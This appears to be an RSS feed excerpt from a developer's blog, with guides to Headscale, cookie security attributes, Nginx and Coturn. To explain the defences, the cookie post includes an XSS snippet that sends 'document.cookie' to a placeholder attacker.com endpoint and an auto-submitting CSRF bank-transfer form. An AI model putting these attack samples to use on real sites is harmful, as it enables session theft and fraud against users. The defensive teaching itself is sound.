<pre><code class="language-bash">sudo headscale nodes register --user myuser --key nodekey:XXXXX
</code></pre>
<h3>macOS Client</h3>
<p>Install Tailscale from the App Store or via Homebrew:</p>
<pre><code class="language-bash">brew install tailscale
</code></pre>
<p>Connect using the CLI:</p>
<pre><code class="language-bash">tailscale up --login-server https://headscale.your-domain.com --authkey YOUR_PREAUTH_KEY
</code></pre>
<h3>Windows Client</h3>
<ol>
<li>Download Tailscale from <a href="https://tailscale.com/download">tailscale.com/download</a></li>
<li>Open PowerShell as Administrator</li>
<li>Run:</li>
</ol>
<pre><code class="language-powershell">tailscale up --login-server https://headscale.your-domain.com --authkey YOUR_PREAUTH_KEY
</code></pre>
<h3>iOS and Android</h3>
<p>For mobile devices, you&#39;ll need to use the web-based registration flow:</p>
<ol>
<li>Install Tailscale from the App Store or Play Store</li>
<li>In the app, choose the custom login server option and enter your Headscale URL</li>
<li>When the login flow presents a node key, register it on your server:</li>
</ol>
<pre><code class="language-bash">sudo headscale nodes register --user myuser --key nodekey:XXXXX
</code></pre>
<h2>Step 10: Managing Nodes</h2>
<p>List all connected nodes:</p>
<pre><code class="language-bash">sudo headscale nodes list
</code></pre>
<p>Delete a node:</p>
<pre><code class="language-bash">sudo headscale nodes delete --identifier NODE_ID
</code></pre>
<p>Rename a node:</p>
<pre><code class="language-bash">sudo headscale nodes rename --identifier NODE_ID &quot;new-hostname&quot;
</code></pre>
<p>Move a node to a different user:</p>
<pre><code class="language-bash">sudo headscale nodes move --identifier NODE_ID --user newuser
</code></pre>
<h2>Step 11: Enable Exit Nodes (Optional)</h2>
<p>To use a node as an exit node for routing all traffic:</p>
<p>On the exit node:</p>
<pre><code class="language-bash">sudo tailscale up --login-server https://headscale.your-domain.com --advertise-exit-node
</code></pre>
<p>Approve the advertised routes on the server (run <code>sudo headscale routes list</code> first to see them; the exact flags vary between Headscale releases):</p>
<pre><code class="language-bash">sudo headscale routes enable --route &quot;0.0.0.0/0&quot; --identifier NODE_ID
sudo headscale routes enable --route &quot;::/0&quot; --identifier NODE_ID
</code></pre>
<p>On client devices, use the exit node:</p>
<pre><code class="language-bash">tailscale up --exit-node=EXIT_NODE_IP
</code></pre>
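<p>To confirm traffic is really leaving through the exit node, check your public IP from the client — it should now match the exit node&#39;s address (ifconfig.me is just one of several IP echo services):</p>
<pre><code class="language-bash"># Should print the exit node&#39;s public IP, not your own
curl https://ifconfig.me
</code></pre>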
<h2>Step 12: Configure Access Control (ACLs)</h2>
<p>Create an ACL policy file:</p>
<pre><code class="language-bash">sudo nano /etc/headscale/acl.json
</code></pre>
<p>Example policy allowing all users to communicate:</p>
<pre><code class="language-json">{
  &quot;acls&quot;: [
    {
      &quot;action&quot;: &quot;accept&quot;,
      &quot;src&quot;: [&quot;*&quot;],
      &quot;dst&quot;: [&quot;*:*&quot;]
    }
  ],
  &quot;tagOwners&quot;: {},
  &quot;hosts&quot;: {}
}
</code></pre>
<p>Update the config to use the ACL file:</p>
<pre><code class="language-yaml">policy:
  mode: file
  path: /etc/headscale/acl.json
</code></pre>
<p>Restart Headscale:</p>
<pre><code class="language-bash">sudo systemctl restart headscale
</code></pre>
<h2>Troubleshooting</h2>
<h3>Connection Issues</h3>
<p>Check if the server is reachable:</p>
<pre><code class="language-bash">curl -I https://headscale.your-domain.com/health
</code></pre>
<h3>Certificate Errors</h3>
<p>Verify certificate validity:</p>
<pre><code class="language-bash">openssl s_client -connect headscale.your-domain.com:443 -servername headscale.your-domain.com
</code></pre>
<h3>Client Not Connecting</h3>
<p>Check client logs:</p>
<pre><code class="language-bash"># Linux
sudo journalctl -u tailscaled -f

# macOS
log stream --predicate &#39;subsystem == &quot;com.tailscale.ipn.macos&quot;&#39;
</code></pre>
<h3>DERP Connectivity</h3>
<p>Test if DERP is working:</p>
<pre><code class="language-bash"># On the server, check if STUN port is listening
sudo ss -tulpn | grep 3478
</code></pre>
<h3>View Server Logs</h3>
<pre><code class="language-bash">sudo journalctl -u headscale -f
</code></pre>
<h2>Security Considerations</h2>
<ul>
<li>Keep Headscale updated to the latest version</li>
<li>Use strong, unique pre-auth keys</li>
<li>Set appropriate expiration times for pre-auth keys</li>
<li>Implement ACLs to restrict network access</li>
<li>Regularly audit connected nodes</li>
<li>Enable automatic certificate renewal</li>
<li>Consider running Headscale behind a reverse proxy for additional security</li>
</ul>
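<p>Regular backups are easy to script, since Headscale keeps all of its state in its config directory and a single SQLite database. A minimal sketch, assuming the default Debian paths (<code>/etc/headscale</code> and <code>/var/lib/headscale</code>):</p>
<pre><code class="language-bash"># Stop briefly so the SQLite database is not copied mid-write
sudo systemctl stop headscale
sudo tar czf &quot;/var/backups/headscale-$(date +%F).tar.gz&quot; /etc/headscale /var/lib/headscale
sudo systemctl start headscale
</code></pre>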
<h2>Conclusion</h2>
<p>Headscale provides a powerful self-hosted alternative to Tailscale&#39;s coordination server. With this setup, you have complete control over your mesh VPN infrastructure while still benefiting from Tailscale&#39;s excellent client software and WireGuard&#39;s security.</p>
<p>The combination of Headscale&#39;s simplicity and Tailscale&#39;s cross-platform clients makes it an excellent choice for homelab enthusiasts, small teams, or organizations that need to keep their network infrastructure fully self-hosted.</p>
<p>Remember to keep your server updated, monitor your logs, and regularly backup your configuration and database!</p>]]></content:encoded>
      <pubDate>Mon, 02 Feb 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>headscale</category>
      <category>tailscale</category>
      <category>vpn</category>
      <category>wireguard</category>
      <category>self-hosted</category>
      <category>networking</category>
      <category>mesh</category>
    </item>
<item>
      <title><![CDATA[HttpOnly, Secure, and SameSite Cookies Explained with Real Auth Example]]></title>
      <link>https://blog.niheshr.com/cookies-https</link>
      <guid isPermaLink="true">https://blog.niheshr.com/cookies-https</guid>
      <description><![CDATA[Deep dive into cookie security attributes with a practical authentication implementation example]]></description>
      <content:encoded><![CDATA[<p>Cookies are fundamental to web authentication, but improper configuration can expose your application to serious security vulnerabilities. This guide explains the three critical cookie security attributes—httpOnly, secure, and sameSite—with a real-world authentication example.</p>
<h2>Understanding Cookie Security Attributes</h2>
<p>Modern web applications face threats like Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). Cookie security attributes are your first line of defense against these attacks.</p>
<h3>The Three Essential Attributes</h3>
<ul>
<li><strong>httpOnly</strong>: Prevents JavaScript from accessing cookies</li>
<li><strong>secure</strong>: Ensures cookies are only sent over HTTPS</li>
<li><strong>sameSite</strong>: Controls when cookies are sent with cross-site requests</li>
</ul>
<h2>HttpOnly: Protecting Against XSS Attacks</h2>
<p>The httpOnly attribute prevents client-side JavaScript from accessing cookies through <code>document.cookie</code>. This is crucial for protecting sensitive tokens like session IDs.</p>
<h3>Without HttpOnly (Vulnerable)</h3>
<pre><code class="language-javascript">// Attacker&#39;s malicious script injected via XSS
const stolenToken = document.cookie;
fetch(&quot;https://attacker.com/steal&quot;, {
  method: &quot;POST&quot;,
  body: JSON.stringify({ token: stolenToken }),
});
</code></pre>
<p>If your authentication cookie lacks httpOnly, an attacker who successfully injects JavaScript can steal it immediately.</p>
<h3>With HttpOnly (Protected)</h3>
<pre><code class="language-javascript">// Server-side: Node.js/Express example
res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true, // JavaScript cannot access this cookie
  maxAge: 24 * 60 * 60 * 1000, // 24 hours
});
</code></pre>
<p>Now even if an attacker injects malicious JavaScript, <code>document.cookie</code> won’t reveal the authentication token.</p>
<h2>Secure: HTTPS-Only Transmission</h2>
<p>The secure attribute ensures cookies are only transmitted over encrypted HTTPS connections, preventing man-in-the-middle attacks.</p>
<h3>The Risk Without Secure</h3>
<p>If a user connects over HTTP (even accidentally), cookies without the secure flag are transmitted in plain text. An attacker on the same network can intercept them.</p>
<h3>Implementation</h3>
<pre><code class="language-javascript">res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true,
  secure: true, // Only sent over HTTPS
  maxAge: 24 * 60 * 60 * 1000,
});
</code></pre>
<p><strong>Important</strong>: In development, you might use HTTP. Handle this conditionally:</p>
<pre><code class="language-javascript">res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true,
  secure: process.env.NODE_ENV === &quot;production&quot;,
  maxAge: 24 * 60 * 60 * 1000,
});
</code></pre>
<h2>SameSite: CSRF Protection</h2>
<p>The sameSite attribute controls whether cookies are sent with cross-site requests, protecting against CSRF attacks.</p>
<h3>SameSite Values</h3>
<ul>
<li><strong>Strict</strong>: Cookie is never sent on cross-site requests</li>
<li><strong>Lax</strong>: Cookie is sent only on top-level navigation with safe HTTP methods (GET)</li>
<li><strong>None</strong>: Cookie is always sent (requires secure attribute)</li>
</ul>
<h3>Understanding CSRF</h3>
<p>Imagine a user is logged into <code>yourbank.com</code>. They visit <code>evil.com</code>, which contains:</p>
<pre><code class="language-html">&lt;form action=&quot;https://yourbank.com/transfer&quot; method=&quot;POST&quot;&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;amount&quot; value=&quot;10000&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;to&quot; value=&quot;attacker-account&quot; /&gt;
&lt;/form&gt;
&lt;script&gt;
  document.forms[0].submit();
&lt;/script&gt;
</code></pre>
<p>Without sameSite protection, the browser automatically includes the authentication cookie with this malicious request.</p>
<h3>Protection with SameSite</h3>
<pre><code class="language-javascript">res.cookie(&quot;authToken&quot;, token, {
  httpOnly: true,
  secure: true,
  sameSite: &quot;strict&quot;, // Blocks cross-site requests entirely
  maxAge: 24 * 60 * 60 * 1000,
});
</code></pre>
<h3>Choosing the Right SameSite Value</h3>
<p><strong>Use Strict when</strong>: You want maximum security and your application doesn’t need cookies on cross-site navigation (like internal dashboards).</p>
<p><strong>Use Lax when</strong>: You need cookies on initial navigation from external sites (common for most web applications). This is the default in modern browsers.</p>
<p><strong>Use None when</strong>: You need cookies in cross-site contexts (like embedded iframes or third-party integrations). Must be combined with secure.</p>
<h2>Real-World Authentication Example</h2>
<p>Let’s build a complete authentication system with properly configured cookies.</p>
<h3>Backend: Express.js Authentication</h3>
<pre><code class="language-javascript">const express = require(&quot;express&quot;);
const jwt = require(&quot;jsonwebtoken&quot;);
const bcrypt = require(&quot;bcrypt&quot;);
const cookieParser = require(&quot;cookie-parser&quot;);

const app = express();
app.use(express.json());
app.use(cookieParser());

const JWT_SECRET = process.env.JWT_SECRET;
const REFRESH_SECRET = process.env.REFRESH_SECRET;

// Login endpoint
app.post(&quot;/api/auth/login&quot;, async (req, res) =&gt; {
  const { email, password } = req.body;

  // Validate credentials (simplified)
  const user = await User.findOne({ email });
  if (!user || !(await bcrypt.compare(password, user.passwordHash))) {
    return res.status(401).json({ error: &quot;Invalid credentials&quot; });
  }

  // Generate tokens
  const accessToken = jwt.sign(
    { userId: user.id, email: user.email },
    JWT_SECRET,
    { expiresIn: &quot;15m&quot; },
  );

  const refreshToken = jwt.sign({ userId: user.id }, REFRESH_SECRET, {
    expiresIn: &quot;7d&quot;,
  });

  // Set secure cookies
  res.cookie(&quot;accessToken&quot;, accessToken, {
    httpOnly: true,
    secure: process.env.NODE_ENV === &quot;production&quot;,
    sameSite: &quot;strict&quot;,
    maxAge: 15 * 60 * 1000, // 15 minutes
  });

  res.cookie(&quot;refreshToken&quot;, refreshToken, {
    httpOnly: true,
    secure: process.env.NODE_ENV === &quot;production&quot;,
    sameSite: &quot;strict&quot;,
    maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days
  });

  res.json({
    success: true,
    user: { id: user.id, email: user.email },
  });
});

// Protected route middleware
const authenticate = (req, res, next) =&gt; {
  const token = req.cookies.accessToken;

  if (!token) {
    return res.status(401).json({ error: &quot;Not authenticated&quot; });
  }

  try {
    const decoded = jwt.verify(token, JWT_SECRET);
    req.user = decoded;
    next();
  } catch (error) {
    return res.status(401).json({ error: &quot;Invalid token&quot; });
  }
};

// Token refresh endpoint
app.post(&quot;/api/auth/refresh&quot;, async (req, res) =&gt; {
  const refreshToken = req.cookies.refreshToken;

  if (!refreshToken) {
    return res.status(401).json({ error: &quot;No refresh token&quot; });
  }

  try {
    const decoded = jwt.verify(refreshToken, REFRESH_SECRET);

    // Generate new access token
    const newAccessToken = jwt.sign({ userId: decoded.userId }, JWT_SECRET, {
      expiresIn: &quot;15m&quot;,
    });

    res.cookie(&quot;accessToken&quot;, newAccessToken, {
      httpOnly: true,
      secure: process.env.NODE_ENV === &quot;production&quot;,
      sameSite: &quot;strict&quot;,
      maxAge: 15 * 60 * 1000,
    });

    res.json({ success: true });
  } catch (error) {
    return res.status(401).json({ error: &quot;Invalid refresh token&quot; });
  }
});

// Logout endpoint
app.post(&quot;/api/auth/logout&quot;, (req, res) =&gt; {
  res.clearCookie(&quot;accessToken&quot;);
  res.clearCookie(&quot;refreshToken&quot;);
  res.json({ success: true });
});

// Protected route example
app.get(&quot;/api/user/profile&quot;, authenticate, (req, res) =&gt; {
  res.json({ user: req.user });
});

app.listen(3000, () =&gt; console.log(&quot;Server running on port 3000&quot;));
</code></pre>
<h3>Frontend: React Authentication</h3>
<pre><code class="language-javascript">import { useState, useEffect } from &quot;react&quot;;

function LoginForm() {
  const [email, setEmail] = useState(&quot;&quot;);
  const [password, setPassword] = useState(&quot;&quot;);
  const [error, setError] = useState(&quot;&quot;);

  const handleLogin = async (e) =&gt; {
    e.preventDefault();

    try {
      const response = await fetch(&quot;http://localhost:3000/api/auth/login&quot;, {
        method: &quot;POST&quot;,
        headers: { &quot;Content-Type&quot;: &quot;application/json&quot; },
        credentials: &quot;include&quot;, // Important: sends cookies
        body: JSON.stringify({ email, password }),
      });

      if (!response.ok) {
        throw new Error(&quot;Login failed&quot;);
      }

      const data = await response.json();
      console.log(&quot;Logged in successfully:&quot;, data.user);
      // Redirect to dashboard
    } catch (err) {
      setError(err.message);
    }
  };

  return (
    &lt;form onSubmit={handleLogin}&gt;
      &lt;input
        type=&quot;email&quot;
        value={email}
        onChange={(e) =&gt; setEmail(e.target.value)}
        placeholder=&quot;Email&quot;
        required
      /&gt;
      &lt;input
        type=&quot;password&quot;
        value={password}
        onChange={(e) =&gt; setPassword(e.target.value)}
        placeholder=&quot;Password&quot;
        required
      /&gt;
      &lt;button type=&quot;submit&quot;&gt;Login&lt;/button&gt;
      {error &amp;&amp; &lt;p className=&quot;error&quot;&gt;{error}&lt;/p&gt;}
    &lt;/form&gt;
  );
}

// API utility with automatic token refresh
async function authenticatedFetch(url, options = {}) {
  const response = await fetch(url, {
    ...options,
    credentials: &quot;include&quot;,
  });

  if (response.status === 401) {
    // Try to refresh token
    const refreshResponse = await fetch(
      &quot;http://localhost:3000/api/auth/refresh&quot;,
      {
        method: &quot;POST&quot;,
        credentials: &quot;include&quot;,
      },
    );

    if (refreshResponse.ok) {
      // Retry original request
      return fetch(url, {
        ...options,
        credentials: &quot;include&quot;,
      });
    }

    // Refresh failed, redirect to login
    window.location.href = &quot;/login&quot;;
    throw new Error(&quot;Authentication failed&quot;);
  }

  return response;
}

// Usage example
function UserProfile() {
  const [profile, setProfile] = useState(null);

  useEffect(() =&gt; {
    authenticatedFetch(&quot;http://localhost:3000/api/user/profile&quot;)
      .then((res) =&gt; res.json())
      .then((data) =&gt; setProfile(data.user))
      .catch((err) =&gt; console.error(err));
  }, []);

  return profile ? &lt;div&gt;Welcome, {profile.email}&lt;/div&gt; : &lt;div&gt;Loading...&lt;/div&gt;;
}
</code></pre>
<h2>CORS Configuration for Cookie-Based Auth</h2>
<p>When using cookies with a separate frontend and backend, configure CORS properly:</p>
<pre><code class="language-javascript">const cors = require(&quot;cors&quot;);

app.use(
  cors({
    origin: &quot;http://localhost:5173&quot;, // Your frontend URL
    credentials: true, // Allow cookies
  }),
);
</code></pre>
<h2>Common Pitfalls and Solutions</h2>
<h3>Issue: Cookies Not Being Set</h3>
<p><strong>Problem</strong>: Frontend doesn’t receive cookies after login.</p>
<p><strong>Solution</strong>: Ensure you’re using <code>credentials: &#39;include&#39;</code> in fetch requests and have proper CORS configuration.</p>
<h3>Issue: Cookies Not Sent with Requests</h3>
<p><strong>Problem</strong>: Authenticated requests fail even after login.</p>
<p><strong>Solution</strong>: Always include <code>credentials: &#39;include&#39;</code> in fetch options and verify sameSite compatibility.</p>
<h3>Issue: SameSite Strict Blocking Legitimate Requests</h3>
<p><strong>Problem</strong>: Users redirected from external sites (like email links) lose authentication.</p>
<p><strong>Solution</strong>: Use <code>sameSite: &#39;lax&#39;</code> instead of strict, or implement a hybrid approach with different cookies for different purposes.</p>
<h2>Security Best Practices Checklist</h2>
<ul>
<li>Always use all three attributes together for authentication cookies</li>
<li>Keep access tokens short-lived (15 minutes or less)</li>
<li>Use refresh tokens for extended sessions</li>
<li>Implement token rotation on refresh</li>
<li>Clear cookies on logout</li>
<li>Use HTTPS in production (required for secure attribute)</li>
<li>Consider additional CSRF tokens for state-changing operations</li>
<li>Regularly rotate signing secrets</li>
<li>Monitor for suspicious authentication patterns</li>
<li>Implement rate limiting on authentication endpoints</li>
</ul>
<h2>Testing Cookie Security</h2>
<p>Test your cookie configuration using browser DevTools:</p>
<ol>
<li>Open DevTools (F12)</li>
<li>Navigate to Application tab</li>
<li>Find Cookies in the sidebar</li>
<li>Verify attributes are set correctly</li>
<li>Try accessing cookies via console with <code>document.cookie</code></li>
</ol>
<p>If httpOnly is properly configured, your authentication cookies won’t appear in the console output.</p>
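<p>You can also inspect the <code>Set-Cookie</code> header directly from the command line. A rough sketch against the login endpoint from the example above (adjust the URL and request body to your API):</p>
<pre><code class="language-bash">curl -si -X POST http://localhost:3000/api/auth/login \
  -H &quot;Content-Type: application/json&quot; \
  -d &#39;{&quot;email&quot;:&quot;user@example.com&quot;,&quot;password&quot;:&quot;hunter2&quot;}&#39; |
  grep -i &#39;^set-cookie&#39;
# Each Set-Cookie line should include HttpOnly, SameSite, and (in production) Secure
</code></pre>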
<h2>Conclusion</h2>
<p>Cookie security attributes are not optional—they’re essential for protecting user sessions and preventing common web vulnerabilities. By combining httpOnly, secure, and sameSite attributes, you create multiple layers of defense against XSS and CSRF attacks.</p>
<p>Remember that cookie security is just one part of a comprehensive security strategy. Always validate input, sanitize output, use parameterized queries, keep dependencies updated, and follow security best practices throughout your application.</p>
<p>Implement these patterns consistently, and you’ll significantly reduce your application’s attack surface while providing a secure authentication experience for your users.</p>]]></content:encoded>
      <pubDate>Tue, 06 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>cookies</category>
      <category>security</category>
      <category>authentication</category>
      <category>web-security</category>
      <category>xss</category>
      <category>csrf</category>
    </item>
<item>
      <title><![CDATA[Setting Up Nginx with systemd Service Files on Linux]]></title>
      <link>https://blog.niheshr.com/nginx-configuration</link>
      <guid isPermaLink="true">https://blog.niheshr.com/nginx-configuration</guid>
      <description><![CDATA[A complete guide to installing Nginx, configuring reverse proxy, and managing it using systemd service files.]]></description>
      <content:encoded><![CDATA[<p>Nginx is a high-performance web server and reverse proxy widely used in production systems. This guide walks through <strong>installing Nginx</strong>, <strong>configuring it</strong>, and <strong>understanding its systemd service files</strong>.</p>
<h2>What is Nginx?</h2>
<p>Nginx is:</p>
<ul>
<li>A web server</li>
<li>A reverse proxy</li>
<li>A load balancer</li>
<li>An SSL termination layer</li>
</ul>
<p>It is commonly used to expose backend applications running on ports like <code>3000</code>, <code>4000</code>, etc.</p>
<h2>Prerequisites</h2>
<ul>
<li>Ubuntu / Debian based Linux</li>
<li>Root or sudo access</li>
<li>A running backend or frontend service to proxy (Node.js, Next.js, an API, etc.)</li>
<li>Optional: Domain name</li>
</ul>
<h2>Step 1: Install Nginx</h2>
<p>Update the system and install Nginx:</p>
<pre><code class="language-bash">sudo apt update
sudo apt install nginx -y
</code></pre>
<p>Check if it&#39;s running:</p>
<pre><code class="language-bash">sudo systemctl status nginx
</code></pre>
<p>Open your server IP in the browser — you should see the Nginx welcome page.</p>
<h2>Step 2: Understanding Nginx File Structure</h2>
<p>Important paths:</p>
<pre><code class="language-bash">/etc/nginx/
├── nginx.conf
├── sites-available/
├── sites-enabled/
├── conf.d/
└── modules-enabled/
</code></pre>
<ul>
<li><strong>sites-available</strong> → All virtual host configs</li>
<li><strong>sites-enabled</strong> → Active configs (symlinks)</li>
<li><strong>nginx.conf</strong> → Main configuration file</li>
</ul>
<h2>Step 3: Create a Reverse Proxy Config</h2>
<p>Create a new site config:</p>
<pre><code class="language-bash">sudo nano /etc/nginx/sites-available/myapp
</code></pre>
<p>Paste this configuration:</p>
<pre><code class="language-nginx">server {
    listen 80;
    server_name your-domain.com;

    location / {
        proxy_pass http://127.0.0.1:3000;
        proxy_http_version 1.1;

        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection &quot;upgrade&quot;;
        proxy_set_header Host $host;

        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}
</code></pre>
<p>Replace:</p>
<ul>
<li><code>your-domain.com</code> with your actual domain</li>
<li><code>3000</code> with your service port</li>
</ul>
<h2>Step 4: Enable the Site</h2>
<p>Create a symlink:</p>
<pre><code class="language-bash">sudo ln -s /etc/nginx/sites-available/myapp /etc/nginx/sites-enabled/
</code></pre>
<p>Test configuration:</p>
<pre><code class="language-bash">sudo nginx -t
</code></pre>
<p>Reload Nginx:</p>
<pre><code class="language-bash">sudo systemctl reload nginx
</code></pre>
<h2>Step 5: Common systemctl Commands</h2>
<pre><code class="language-bash">sudo systemctl start nginx
sudo systemctl stop nginx
sudo systemctl restart nginx
sudo systemctl reload nginx
sudo systemctl enable nginx
sudo systemctl disable nginx
</code></pre>
<p>Check logs:</p>
<pre><code class="language-bash">journalctl -u nginx -f
</code></pre>
<h2>Step 6: Custom Error Pages (Optional)</h2>
<p>Create an error page:</p>
<pre><code class="language-bash">sudo nano /var/www/html/50x.html
</code></pre>
<p>Example HTML content:</p>
<pre><code class="language-html">&lt;h1&gt;Service Temporarily Unavailable&lt;/h1&gt;
&lt;p&gt;Please try again later.&lt;/p&gt;
</code></pre>
<p>Add to your server block:</p>
<pre><code class="language-nginx">error_page 502 503 504 /50x.html;

location = /50x.html {
    root /var/www/html;
}
</code></pre>
<p>Reload Nginx:</p>
<pre><code class="language-bash">sudo systemctl reload nginx
</code></pre>
<h2>Step 7: Firewall Configuration</h2>
<pre><code class="language-bash">sudo ufw allow &#39;Nginx Full&#39;
sudo ufw reload
</code></pre>
<p><strong>Important:</strong> Be careful not to lose your SSH access when configuring firewall rules!</p>
<h2>Common Issues &amp; Fixes</h2>
<h3>Bad Gateway (502)</h3>
<p>Common causes:</p>
<ul>
<li>Backend service not running</li>
<li>Wrong port in <code>proxy_pass</code></li>
<li>App bound to localhost incorrectly</li>
</ul>
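<p>The first two causes are quick to rule out from the server itself (3000 is the port assumed in the config above — substitute your app&#39;s port):</p>
<pre><code class="language-bash"># Is anything listening on the upstream port?
sudo ss -tlnp | grep :3000

# Does the backend answer locally?
curl -I http://127.0.0.1:3000
</code></pre>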
<h3>Config Not Loading</h3>
<p>Always test your configuration before reloading:</p>
<pre><code class="language-bash">sudo nginx -t
</code></pre>
<p>This will check for syntax errors in your Nginx configuration files.</p>
<h2>Conclusion</h2>
<p>Nginx is a powerful tool that transforms your application from a localhost project into a production-ready service. With reverse proxy configuration and systemd management, you can serve your apps securely, scale efficiently, and handle failures gracefully.</p>
<p>Whether you&#39;re deploying a Next.js app, a Node.js API, or any web service — mastering Nginx is essential for modern deployment workflows. Keep experimenting, monitor your logs, and your deployments will become second nature!</p>]]></content:encoded>
      <pubDate>Tue, 06 Jan 2026 00:00:00 GMT</pubDate>
      <author>contact@niheshr.com (Nihesh Rachakonda)</author>
      <category>nginx</category>
      <category>linux</category>
      <category>systemd</category>
      <category>reverse-proxy</category>
      <category>deployment</category>
    </item>
<item>
      <title><![CDATA[Setting Up a TURN Server with Coturn]]></title>
      <link>https://blog.niheshr.com/turn-server-setup</link>
      <guid isPermaLink="true">https://blog.niheshr.com/turn-server-setup</guid>
      <description><![CDATA[Complete guide to setting up a TURN server using Coturn for WebRTC applications]]></description>
      <content:encoded><![CDATA[<p>TURN (Traversal Using Relays around NAT) servers are essential for WebRTC applications to work reliably across different network configurations. This guide will walk you through installing and configuring a TURN server using Coturn.</p>
<h2>What is TURN?</h2>
<p>TURN is a protocol that allows peers behind NATs or firewalls to communicate by relaying media through a server. It&#39;s often used alongside STUN servers for WebRTC applications.</p>
<h2>Prerequisites</h2>
<ul>
<li>Ubuntu/Debian server (or similar Linux distribution)</li>
<li>Root or sudo access</li>
<li>Domain name with SSL certificate (Can get one using Let&#39;s Encrypt)</li>
<li>Public IP address</li>
</ul>
<h2>Step 1: Install Coturn</h2>
<p>First, update your system and install Coturn:</p>
<pre><code class="language-bash">sudo apt update
sudo apt upgrade -y
sudo apt install coturn -y
</code></pre>
<h2>Step 2: Configure SSL Certificate</h2>
<p>Install Certbot for Let&#39;s Encrypt certificates:</p>
<pre><code class="language-bash">sudo apt install certbot -y
sudo certbot certonly --standalone -d your-domain.com
</code></pre>
<p>Replace <code>your-domain.com</code> with your actual domain name.</p>
<h3>Set Proper Permissions for SSL Certificates</h3>
<p>Coturn runs as the <code>turnserver</code> user, so it must be able to read the certificates. Hand over ownership, but keep the private key unreadable to everyone else:</p>
<pre><code class="language-bash">sudo chown turnserver:turnserver /etc/letsencrypt/live/your-domain.com/
sudo chown turnserver:turnserver /etc/letsencrypt/live/your-domain.com/*
sudo chmod 644 /etc/letsencrypt/live/your-domain.com/fullchain.pem
sudo chmod 600 /etc/letsencrypt/live/your-domain.com/privkey.pem
</code></pre>
<h2>Step 3: Configure Coturn</h2>
<p>Create the configuration file:</p>
<pre><code class="language-bash">sudo nano /etc/turnserver.conf
</code></pre>
<p>Add the following configuration (replace with your actual values):</p>
<pre><code class="language-bash"># === REALM &amp; AUTH ===
realm=your-domain.com
server-name=turn-server
lt-cred-mech
fingerprint

# === LISTENING CONFIGURATION ===
listening-port=3478
tls-listening-port=5349
listening-ip=0.0.0.0

# === CRITICAL FIX: RELAY &amp; EXTERNAL IPs ===
relay-ip=YOUR_PRIVATE_IP
external-ip=YOUR_PUBLIC_IP/YOUR_PRIVATE_IP

# === CREDENTIALS ===
user=turnuser:securepassword123

# === CERTIFICATES ===
cert=/etc/letsencrypt/live/your-domain.com/fullchain.pem
pkey=/etc/letsencrypt/live/your-domain.com/privkey.pem

# === PORT RANGE ===
min-port=49152
max-port=65535

# === LOGGING ===
log-file=/var/log/turnserver/turn.log
verbose

# === SECURITY &amp; BEHAVIOR ===
no-rfc5780
no-stun-backward-compatibility
response-origin-only-with-rfc5780
syslog
no-multicast-peers

# === CLI PASSWORD (IF REQUIRED) ===
cli-password=your-password

# === ALLOCATION TIMEOUT ===
stale-nonce=3600
bps-capacity=0

max-bps=3000000
user-quota=0
total-quota=0
</code></pre>
<h3>Key Configuration Options Explained:</h3>
<ul>
<li><strong>realm</strong>: Your domain name</li>
<li><strong>relay-ip</strong>: Your server&#39;s private IP address</li>
<li><strong>external-ip</strong>: Public IP followed by private IP (separated by slash)</li>
<li><strong>user</strong>: Username and password for TURN authentication</li>
<li><strong>cert/pkey</strong>: Paths to your SSL certificates</li>
</ul>
<h2>Step 4: Set Up Logging Directory</h2>
<p>Create the log directory and set permissions:</p>
<pre><code class="language-bash">sudo mkdir -p /var/log/turnserver
sudo chown turnserver:turnserver /var/log/turnserver
</code></pre>
<h2>Step 5: Configure Firewall</h2>
<p>Allow the necessary ports through your firewall:</p>
<pre><code class="language-bash">sudo ufw allow 3478/tcp
sudo ufw allow 3478/udp
sudo ufw allow 5349/tcp
sudo ufw allow 5349/udp
sudo ufw allow 49152:65535/udp
</code></pre>
<h3>Cloud Provider Security Rules</h3>
<p>If deploying on a cloud provider (AWS, Azure, etc.), configure your security groups or network security groups to allow inbound traffic on the following ports (adjust source IPs as needed for security):</p>
<ul>
<li><strong>TCP and UDP:</strong> 3478</li>
<li><strong>TCP and UDP:</strong> 5349</li>
<li><strong>UDP:</strong> 49152-65535</li>
</ul>
<p>Outbound rules should allow all traffic, which is the default in most cloud providers and sufficient for TURN server operation.</p>
<h2>Step 6: Start and Enable Coturn Service</h2>
<pre><code class="language-bash">sudo systemctl enable coturn
sudo systemctl start coturn
sudo systemctl status coturn
</code></pre>
<h2>Step 7: Test Your TURN Server</h2>
<p>You can test your TURN server using tools like <a href="https://webrtc.github.io/samples/src/content/peerconnection/trickle-ice/">Trickle ICE</a> or command-line tools.</p>
<h3>Using turnutils</h3>
<pre><code class="language-bash"># turnutils_uclient is installed with the coturn package from Step 1
turnutils_uclient -t -u turnuser -w securepassword123 your-domain.com
</code></pre>
<h2>Troubleshooting</h2>
<h3>Common Issues:</h3>
<ol>
<li><strong>Port binding errors</strong>: Check if ports are already in use</li>
<li><strong>Certificate errors</strong>: Ensure certificate paths are correct</li>
<li><strong>Connection failures</strong>: Verify firewall rules and IP configurations</li>
</ol>
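<p>For port-binding and connection failures, first confirm coturn is actually listening and can read its TLS key (ports and paths as configured above):</p>
<pre><code class="language-bash"># Are the STUN/TLS ports bound?
sudo ss -tulpn | grep -E &#39;:(3478|5349)&#39;

# Can the turnserver user read the private key?
sudo -u turnserver test -r /etc/letsencrypt/live/your-domain.com/privkey.pem &amp;&amp; echo &quot;key readable&quot;
</code></pre>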
<h3>Check logs:</h3>
<pre><code class="language-bash">sudo tail -f /var/log/turnserver/turn.log
</code></pre>
<h2>Security Considerations</h2>
<ul>
<li>Use strong passwords for TURN credentials</li>
<li>Keep SSL certificates up to date</li>
<li>Monitor server logs for suspicious activity</li>
<li>Consider using a dedicated user for TURN operations</li>
</ul>
<h2>Usage in WebRTC Applications</h2>
